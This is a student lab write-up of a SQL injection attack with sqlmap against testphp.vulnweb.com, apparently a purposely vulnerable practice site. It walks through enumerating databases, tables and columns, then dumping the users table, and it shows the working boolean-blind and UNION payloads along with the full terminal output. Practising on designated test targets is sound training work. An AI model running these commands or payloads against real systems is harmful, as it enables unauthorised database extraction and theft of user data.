Assignment1 ( Sqlmap)

➤➤ I am using Sqlmap to Conduct Attack on a website.
➤➤ First command that i am passing is to check databases of that website.
       And the command is 
	                 $ sqlmap -u testphp.vulnweb.com/artists.php?artist=1 –dbs
                   
┌──(kali㉿kali)-[~]
└─$ sqlmap -u testphp.vulnweb.com/artists.php?artist=1 –dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.11#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:23:25 /2023-01-21/

[12:23:26] [INFO] testing connection to the target URL
[12:23:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:23:31] [INFO] testing if the target URL content is stable
[12:23:33] [INFO] target URL content is stable
[12:23:33] [INFO] testing if GET parameter 'artist' is dynamic
[12:23:37] [INFO] GET parameter 'artist' appears to be dynamic
[12:23:38] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
[12:23:39] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[12:24:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:24:17] [INFO] GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="sem")
[12:24:17] [INFO] testing 'Generic inline queries'
[12:24:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:24:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:24:19] [WARNING] time-based comparison requires larger statistical model, please wait.................... (done)                                                          
[12:24:41] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:24:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:24:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:24:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:24:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:24:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:24:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:24:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:24:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:24:54] [INFO] testing 'Oracle AND time-based blind'
[12:24:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:24:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:24:56] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:25:06] [INFO] target URL appears to have 3 columns in query
[12:25:10] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[12:27:09] [INFO] testing MySQL
[12:27:09] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[12:27:11] [INFO] confirming MySQL
[12:27:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 8.0.0
[12:27:17] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[12:27:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 12:27:17 /2023-01-21/
----------------------------------------------------------------------------------------------------------------------------------------------
 ➤➤ After executing [sqlmap -u testphp.vulnweb.com/artists.php?artist=1 –dbs] it gives two Databases of that website.
 ➤➤ Names of those databases are 1.acuart 2.information_schema.
 ➤➤ I will be performing operations on Acuart
---------------------------------------------------------------------------------------------------------------------------------------
 ➤➤ To Check tables of Acuart Database i am using this command
           sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart –tables
 ➤➤ This gives list of tables in databse 

┌──(kali㉿kali)-[~]
└─$ sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart –tables
        ___
       __H__                                                                                                                                                                   
 ___ ___[.]_____ ___ ___  {1.6.11#stable}                                                                                                                                      
|_ -| . ["]     | .'| . |                                                                                                                                                      
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:45:14 /2023-01-21/

[12:45:15] [INFO] resuming back-end DBMS 'mysql' 
[12:45:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[12:45:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[12:45:24] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[12:45:25] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 12:45:25 /2023-01-21/
---------------------------------------------------------------------------------------------------------------------------------
➤➤ To Dump database to localhost(my machine) i am using this command 
                            $ sqlmap -u testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users –dump
➤➤ Data of table is dumped in CSV file form 
                             table 'acuart.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'

┌──(kali㉿kali)-[~]
└─$ sqlmap -u testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users –dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:00:46 /2023-01-21/

[14:00:47] [INFO] resuming back-end DBMS 'mysql' 
[14:00:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[14:00:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[14:00:49] [INFO] fetching columns for table 'users' in database 'acuart'
[14:00:49] [INFO] fetching entries for table 'users' in database 'acuart'
[14:00:49] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: acuart
Table: users
[1 entry]
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+
| cc                              | cart                             | name                                                 | pass | email              | phone          | uname | address                             |
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+
| if(now()=sysdate(),sleep(15),0) | 53e65b66b4db3fce92fd1f03dc5ae072 | <marquee><h1>198991*97996*98991*97996</h1></marquee> | test | sklovoit@gmail.com | +1 202 015 644 | test  | "+response.write(268409241-50872)+" |
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+

[14:00:57] [INFO] table 'acuart.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[14:00:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 14:00:57 /2023-01-21
------------------------------------------------------------------------------------------
➤➤ to check the columns of a table present in the database Acuart i used this command - tablename - columns 
                     sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart –T artists –columns
➤➤ It gives Columns of a table and its data type.
         [3 columns]
         +-----------+-------------+
         | Column    | Type        |
         +-----------+-------------+
         | adesc     | text        |
         | aname     | varchar(50) |
	 | artist_id | int         |
	 +-----------+-------------+
                                                                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart –T artists –columns
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.6.11#stable}                                                                                                                                       
|_ -| . [)]     | .'| . |                                                                                                                                                       
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:11:34 /2023-01-21/

[14:11:34] [INFO] resuming back-end DBMS 'mysql' 
[14:11:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[14:11:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[14:11:37] [INFO] fetching columns for table 'artists' in database 'acuart'
Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int         |
+-----------+-------------+

[14:11:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 14:11:38 /2023-01-21/
----------------------------------------------------------------------------------------------------------------------------------
➤➤ to check all columns present in the database Acuart i used this command -database name  - columns 
                     sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart  –columns
➤➤ This gives all tables and their Colunms present in a database

┌──(kali㉿kali)-[~]
└─$   sqlmap –u testphp.vulnweb.com/artists.php?artist=1 –D acuart  –columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:19:03 /2023-01-21/

[14:19:04] [INFO] resuming back-end DBMS 'mysql' 
[14:19:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[14:19:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[14:19:07] [INFO] fetching tables for database: 'acuart'
[14:19:07] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'artists' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'products' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'users' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'categ' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'carts' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'featured' in database 'acuart'
[14:19:07] [INFO] fetching columns for table 'pictures' in database 'acuart'
Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int          |
+----------+--------------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int         |
+-----------+-------------+

Database: acuart
Table: products
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| description | text         |
| id          | int unsigned |
| name        | text         |
| price       | int unsigned |
| rewritename | text         |
+-------------+--------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int         |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int          |
| price   | int          |
+---------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+------+
| Column       | Type |
+--------------+------+
| feature_text | text |
| pic_id       | int  |
+--------------+------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int          |
| cat_id | int          |
| img    | varchar(50)  |
| pic_id | int          |
| plong  | text         |
| price  | int          |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

[14:19:07] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 14:19:07 /2023-01-21/
--------------------------------------------------------------------------------------------------------------------------
  
➤➤ To check the admin credentials Amoung the users i passed this command 
                          sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" –method "POST" –data "username=admin&password=admin&submit=Submit" -D acuart -T users –dum
➤➤ This command Check the user table and gives Admin credentials 
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" –method "POST" –data "username=admin&password=admin&submit=Submit" -D acuart -T users –dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:29:47 /2023-01-21/

[14:29:48] [INFO] resuming back-end DBMS 'mysql' 
[14:29:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3515=3515

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9502 UNION ALL SELECT NULL,NULL,CONCAT(0x7176716a71,0x514c4861616c674b575954776242757741736b794a7241774d7756736f62477a4c444a6776676a59,0x7170717a71)-- -
---
[14:29:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[14:29:50] [INFO] fetching columns for table 'users' in database 'acuart'
[14:29:50] [INFO] fetching entries for table 'users' in database 'acuart'
[14:29:51] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: acuart
Table: users
[1 entry]
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+
| cc                              | cart                             | name                                                 | pass | email              | phone          | uname | address                             |
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+
| if(now()=sysdate(),sleep(15),0) | 53e65b66b4db3fce92fd1f03dc5ae072 | <marquee><h1>198991*97996*98991*97996</h1></marquee> | test | sklovoit@gmail.com | +1 202 015 644 | test  | "+response.write(268409241-50872)+" |
+---------------------------------+----------------------------------+------------------------------------------------------+------+--------------------+----------------+-------+-------------------------------------+

[14:29:59] [INFO] table 'acuart.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[14:29:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 14:29:59 /2023-01-21/

                                                                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 


  
	  

